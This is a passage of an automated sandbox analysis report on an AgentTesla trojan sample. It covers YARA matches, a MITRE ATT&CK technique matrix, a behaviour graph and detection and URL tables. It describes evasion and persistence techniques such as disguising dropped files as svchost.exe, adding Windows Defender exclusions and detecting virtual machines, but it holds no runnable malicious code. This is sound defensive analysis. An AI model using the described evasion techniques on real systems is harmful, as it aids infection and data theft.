Source: Yara match; File source: 1.0.VknMvPoCXZ.exe.38b97a0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.VknMvPoCXZ.exe.39197e0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.VknMvPoCXZ.exe.38d97c0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.VknMvPoCXZ.exe.38d97c0.7.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.VknMvPoCXZ.exe.39197e0.28.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.VknMvPoCXZ.exe.39197e0.31.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.VknMvPoCXZ.exe.38d97c0.29.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.VknMvPoCXZ.exe.38b97a0.30.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.VknMvPoCXZ.exe.38d97c0.7.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.VknMvPoCXZ.exe.39197e0.31.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 40.2.svchost.exe.3e41440.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.VknMvPoCXZ.exe.39197e0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.VknMvPoCXZ.exe.39197e0.28.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000001.00000002.588060641.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000000.436158543.0000000003919000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.588256996.0000000003919000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000000.431825282.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000000.434117466.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000000.432432130.0000000003919000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000000.374239562.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000000.374484408.0000000003919000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: VknMvPoCXZ.exe PID: 2244, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: svchost.exe PID: 4496, type: MEMORYSTR

                      Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 331 | Startup Items 1 | Startup Items 1 | Disable or Modify Tools 211 | OS Credential Dumping | File and Directory Discovery 2 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Native API 1 | DLL Side-Loading 1 | Exploitation for Privilege Escalation 1 | Deobfuscate/Decode Files or Information 11 | LSASS Memory | System Information Discovery 134 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Command and Scripting Interpreter 1 | Application Shimming 1 | DLL Side-Loading 1 | Obfuscated Files or Information 2 | Security Account Manager | Query Registry 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Service Execution 2 | Windows Service 1 | Application Shimming 1 | Timestomp 1 | NTDS | Security Software Discovery 461 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Registry Run Keys / Startup Folder 321 | Access Token Manipulation 1 | DLL Side-Loading 1 | LSA Secrets | Virtualization/Sandbox Evasion 261 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Windows Service 1 | Masquerading 221 | Cached Domain Credentials | Process Discovery 3 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Process Injection 212 | Virtualization/Sandbox Evasion 261 | DCSync | Application Window Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Registry Run Keys / Startup Folder 321 | Access Token Manipulation 1 | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 212 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

                      Behavior Graph


                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph ID: 483863; Sample: VknMvPoCXZ; Startdate: 15/09/2021; Architecture: WINDOWS; Score: 100

Graph contents (rendered as an image on the page; nodes are listed here by their graph node number):

• Start (node 2): signatures: Multi AV Scanner detection for dropped file; Sigma detected: Powershell adding suspicious path to exclusion list; Multi AV Scanner detection for submitted file; 9 other signatures. Started: VknMvPoCXZ.exe (node 7), svchost.exe (node 11), 481F404B.exe (node 13), 9 other processes (node 16).
• VknMvPoCXZ.exe (node 7; badges 9 11): dropped C:\Windows\Resources\Themes\...\svchost.exe (PE32); C:\Users\user\AppData\...\481F404B.exe (PE32); C:\Windows\...\svchost.exe:Zone.Identifier (ASCII); 2 other files (1 malicious). Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Creates autostart registry keys with suspicious names; Drops PE files to the startup folder; 4 other signatures. Started: aspnet_compiler.exe (node 18), 481F404B.exe (node 21), WerFault.exe (node 24), 9 other processes (node 28).
• svchost.exe (node 11): dropped C:\Users\user\AppData\...\AdvancedRun.exe (PE32). Signatures: Multi AV Scanner detection for dropped file; Adds a directory exclusion to Windows Defender.
• 481F404B.exe (node 13): DNS/IP: 192.168.2.1 unknown unknown. Dropped C:\Users\user\AppData\...\AdvancedRun.exe (PE32).
• 9 other processes (node 16): DNS/IP: 127.0.0.1 unknown unknown. Dropped C:\Users\user\AppData\...\AdvancedRun.exe (PE32). Signatures: Changes security center settings (notifications, updates, antivirus, firewall). Started: WerFault.exe (node 26).
• aspnet_compiler.exe (node 18): signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines).
• 481F404B.exe (node 21): dropped C:\Users\user\AppData\...\AdvancedRun.exe (PE32). Signatures: Adds a directory exclusion to Windows Defender.
• WerFault.exe (node 24): dropped C:\ProgramData\Microsoft\...\Report.wer (Little-endian).
• 9 other processes (node 28): started AdvancedRun.exe (node 30), conhost.exe (node 32), conhost.exe (node 34), 6 other processes (node 36).

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label | Link
VknMvPoCXZ.exe | 48% | Virustotal | | Browse
VknMvPoCXZ.exe | 44% | ReversingLabs | Win32.Trojan.AgentTesla |

                      Dropped Files

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe | 3% | Metadefender | | Browse
C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe | 3% | Metadefender | | Browse
C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe | 3% | Metadefender | | Browse
C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe | 3% | Metadefender | | Browse
C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe | 3% | Metadefender | | Browse
C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe | 44% | ReversingLabs | Win32.Trojan.AgentTesla |
C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe | 44% | ReversingLabs | Win32.Trojan.AgentTesla |

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label | Link
http://www.jiyu-kobo.co.jp/curs | 0% | Avira URL Cloud | safe |
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | 0% | URL Reputation | safe |
http://www.sajatypeworks.com | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/H. | 0% | Avira URL Cloud | safe |
http://www.sandoll.co.krlea | 0% | Avira URL Cloud | safe |
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe |
http://www.sandoll.co.kropyw2- | 0% | Avira URL Cloud | safe |
http://www.fonts.comc | 0% | URL Reputation | safe |
https://mhconsultores.net.ve/ | 0% | Avira URL Cloud | safe |
http://crl.ver) | 0% | Avira URL Cloud | safe |
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | URL Reputation | safe |
https://%s.xboxlive.com | 0% | URL Reputation | safe |
http://en.w | 0% | URL Reputation | safe |
http://www.carterandcone.coml | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn/ | 0% | URL Reputation | safe |
http://www.sandoll.co.krB2 | 0% | Avira URL Cloud | safe |
http://www.jiyu-kobo.co.jp/c. | 0% | Avira URL Cloud | safe |
https://dynamic.t | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/Y0/ | 0% | URL Reputation | safe |
http://www.microsoftc. | 0% | Avira URL Cloud | safe |
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe |
http://www.fontbureau.comicva | 0% | Avira URL Cloud | safe |
http://www.tiro.com | 0% | URL Reputation | safe |
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/5. | 0% | Avira URL Cloud | safe |
http://www.goodfont.co.kr | 0% | URL Reputation | safe |
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | 0% | URL Reputation | safe |
http://www.tiro.comnm | 0% | Avira URL Cloud | safe |
http://www.typography.netD | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
http://fontfabrik.com | 0% | URL Reputation | safe |
https://sectigo.com/CPS0C | 0% | URL Reputation | safe |
https://sectigo.com/CPS0D | 0% | URL Reputation | safe |
http://www.sandoll.co.kr | 0% | URL Reputation | safe |
http://www.founder.com.cn/cnf | 0% | URL Reputation | safe |
http://www.sakkal.com | 0% | URL Reputation | safe |
http://www.fontbureau.comue | 0% | URL Reputation | safe |
https://sectigo.com/CPS0 | 0% | URL Reputation | safe |
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0# | 0% | URL Reputation | safe |
https://activity.windows.comr | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/jp/ | 0% | URL Reputation | safe |
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y | 0% | URL Reputation | safe |
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe |
http://www.sajatypeworks.comnt | 0% | Avira URL Cloud | safe |
http://www.fontbureau.comm | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
https://%s.dnet.xboxlive.com | 0% | URL Reputation | safe |

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.jiyu-kobo.co.jp/curs | VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://dev.ditu.live.com/REST/v1/Routes/ | svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/ | svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmp | false | | high
https://t0.tiles.ditu.live.com/tiles/gen | svchost.exe, 0000000B.00000003.307917223.0000021F0B447000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Routes/Walking | svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com/designers | VknMvPoCXZ.exe, 00000001.00000003.251876624.00000000055DD000.00000004.00000001.sdmp | false | | high
http://www.sajatypeworks.com | VknMvPoCXZ.exe, 00000001.00000003.245404887.00000000055EB000.00000004.00000001.sdmp, VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/ | svchost.exe, 0000000B.00000003.308621783.0000021F0B45A000.00000004.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/H. | VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.virtualearth.net/REST/v1/Transit/Schedules/ | svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmp | false | | high
http://www.sandoll.co.krlea | VknMvPoCXZ.exe, 00000001.00000003.246740797.00000000055D6000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/DPlease | VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://appexmapsappupdate.blob.core.windows.net | svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmp | false | | high
http://www.urwpp.deDPlease | VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.nirsoft.net/ | AdvancedRun.exe, AdvancedRun.exe, 00000007.00000000.273104698.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmp | false | | high
http://www.zhongyicts.com.cn | VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | VknMvPoCXZ.exe, 00000001.00000000.402866730.00000000026E1000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmp | false | | high
http://www.bingmapsportal.com | svchost.exe, 0000000B.00000002.309883940.0000021F0B413000.00000004.00000001.sdmp | false | | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | VknMvPoCXZ.exe, 00000001.00000002.588060641.00000000038A1000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sandoll.co.kropyw2- | VknMvPoCXZ.exe, 00000001.00000003.246740797.00000000055D6000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.fonts.comc | VknMvPoCXZ.exe, 00000001.00000003.245502248.00000000055EB000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r= | svchost.exe, 0000000B.00000003.308834752.0000021F0B445000.00000004.00000001.sdmp | false | | high
https://mhconsultores.net.ve/ | svchost.exe | false | Avira URL Cloud: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/ | svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmp | false | | high
http://crl.ver) | svchost.exe, 00000004.00000002.563938277.0000028D9A40F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r= | svchost.exe, 0000000B.00000002.309883940.0000021F0B413000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmp | false | | high
https://%s.xboxlive.com | svchost.exe, 00000009.00000002.560698282.000002BA27C3E000.00000004.00000001.sdmp | false | URL Reputation: safe | low
https://dev.virtualearth.net/REST/v1/Locations | svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmp | false | | high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v= | svchost.exe, 0000000B.00000003.284686456.0000021F0B431000.00000004.00000001.sdmp | false | | high
http://en.w | VknMvPoCXZ.exe, 00000001.00000003.244837348.000000000082D000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/ | VknMvPoCXZ.exe, 00000001.00000003.248063336.00000000055D4000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sandoll.co.krB2 | VknMvPoCXZ.exe, 00000001.00000003.246740797.00000000055D6000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | false | | high
http://www.jiyu-kobo.co.jp/c. | VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/ | svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmp | false | | high
https://dynamic.t | svchost.exe, 0000000B.00000003.307917223.0000021F0B447000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.308621783.0000021F0B45A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/Y0/ | VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit | svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmp | false | | high
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r= | svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmp | false | | high
http://www.microsoftc. | VknMvPoCXZ.exe, 00000001.00000003.248063336.00000000055D4000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/ | svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmp | false | | high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r= | svchost.exe, 0000000B.00000003.308621783.0000021F0B45A000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://ocsp.sectigo.com0 | VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.comicva | VknMvPoCXZ.exe, 00000001.00000000.483452805.00000000055D0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/Driving | svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx | svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com/designers? | VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | false | | high
http://www.tiro.com | VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmp | false | URL Reputation: safe |
                                                                            unknown
                                                                            http://www.jiyu-kobo.co.jp/5.VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.goodfont.co.krVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.tiro.comnmVknMvPoCXZ.exe, 00000001.00000003.245836341.00000000055EB000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                http://www.typography.netDVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000B.00000003.284686456.0000021F0B431000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  http://www.galapagosdesign.com/staff/dennis.htmVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://fontfabrik.comVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://sectigo.com/CPS0CVknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://sectigo.com/CPS0DVknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://www.fonts.comVknMvPoCXZ.exe, 00000001.00000003.245502248.00000000055EB000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    http://www.sandoll.co.krVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://www.founder.com.cn/cnfVknMvPoCXZ.exe, 00000001.00000003.247610045.000000000560D000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://www.sakkal.comVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        http://www.apache.org/licenses/LICENSE-2.0VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          http://www.fontbureau.comVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            http://www.fontbureau.comueVknMvPoCXZ.exe, 00000001.00000000.483452805.00000000055D0000.00000004.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://sectigo.com/CPS0VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://www.fontbureau.com/designers19VknMvPoCXZ.exe, 00000001.00000003.251440194.00000000055D9000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 0000000B.00000003.284686456.0000021F0B431000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  https://activity.windows.comrsvchost.exe, 00000009.00000002.560698282.000002BA27C3E000.00000004.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://www.jiyu-kobo.co.jp/jp/VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000B.00000003.307917223.0000021F0B447000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpfalse
                                                                                                      high
